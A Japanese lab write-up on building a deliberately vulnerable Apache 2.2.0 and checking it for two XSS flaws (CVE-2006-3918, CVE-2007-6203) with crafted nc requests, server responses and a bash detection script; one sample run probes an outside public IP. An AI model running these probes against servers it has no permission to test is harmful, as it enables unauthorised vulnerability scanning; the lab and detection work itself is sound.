新しい脆弱性の話ではないです。やられ Apache の作り方と検証例です。
やられ Apache のインストール手順
yum -y install gcc openssl-devel wget http://archive.apache.org/dist/httpd/httpd-2.2.0.tar.gz tar zxf httpd-2.2.0.tar.gz cd httpd-2.2.0/ ./configure --prefix=/usr/local/httpd-2.2.0 --enable-mods-shared=all --enable-ssl make sudo make install sudo /usr/local/httpd-2.2.0/bin/apachectl start sudo /sbin/iptables -I INPUT -p tcp -m state --state NEW -m tcp --dport 80 192.168.0.0/24 -j ACCEPT
Apache Expect ヘッダのクロスサイトスクリプティング脆弱性
$ echo -en "GET / HTTP/1.0\nExpect: <orz>\n\n" | nc 192.168.0.128 80 HTTP/1.1 417 Expectation Failed Date: Wed, 27 Jan 2010 12:46:40 GMT Server: Apache/2.2.0 (Unix) mod_ssl/2.2.0 OpenSSL/0.9.8e-fips-rhel5 DAV/2 Content-Length: 360 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>417 Expectation Failed</title> </head><body> <h1>Expectation Failed</h1> <p>The expectation given in the Expect request-header field could not be met by this server.</p> <p>The client sent<pre> Expect: <orz> </pre> but we only allow the 100-continue expectation.</p> </body></html>
Apache HTTP メソッドのクロスサイトスクリプティング
$ echo -en "<orz> / HTTP/1.1\nHost: 192.168.0.128\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc 192.168.0.128 80 HTTP/1.1 413 Request Entity Too Large Date: Wed, 27 Jan 2010 12:47:34 GMT Server: Apache/2.2.0 (Unix) mod_ssl/2.2.0 OpenSSL/0.9.8e-fips-rhel5 DAV/2 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>413 Request Entity Too Large</title> </head><body> <h1>Request Entity Too Large</h1> The requested resource<br />/index.html<br /> does not allow request data with <orz> requests, or the amount of data provided in the request exceeds the capacity limit. </body></html>
検証用スクリプト
#!/bin/bash
LANG=C
IPADDR=${1}
PORT=${2}
echo "# Check Apache Cross Site Scripting" >&2
echo "# (1) CVE-2006-3918: Apache Expect Header XSS" >&2
echo "# (2) CVE-2007-6203: Apache HTTP Method XSS" >&2
echo "# IpAddr:Port,CVE-2006-3918,CVE-2007-6203" >&2
echo -n "${IPADDR}:${PORT},"
echo -en "GET / HTTP/1.0\nExpect: <orz>\n\n" | nc ${IPADDR} ${PORT} | grep -q "<orz>" && echo -n "VULNERABLE" || echo -n "not_vulnerable"
echo -n ","
echo -en "<orz> / HTTP/1.1\nHost: ${IPADDR}\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc ${IPADDR} ${PORT} | grep -q "<orz>" && echo -n "VULNERABLE" || echo -n "not_vulnerable"
echo ""
exit 0
検証用スクリプト実行例
$ ./apache_xss.sh 192.168.0.128 80 # Check Apache Cross Site Scripting # (1) CVE-2006-3918: Apache Expect Header XSS # (2) CVE-2007-6203: Apache HTTP Method XSS # IpAddr:Port,CVE-2006-3918,CVE-2007-6203 192.168.0.128:80,VULNERABLE,VULNERABLE $ ./apache_xss.sh 116.58.170.251 80 # Check Apache Cross Site Scripting # (1) CVE-2006-3918: Apache Expect Header XSS # (2) CVE-2007-6203: Apache HTTP Method XSS # IpAddr:Port,CVE-2006-3918,CVE-2007-6203 116.58.170.251:80,not_vulnerable,not_vulnerable
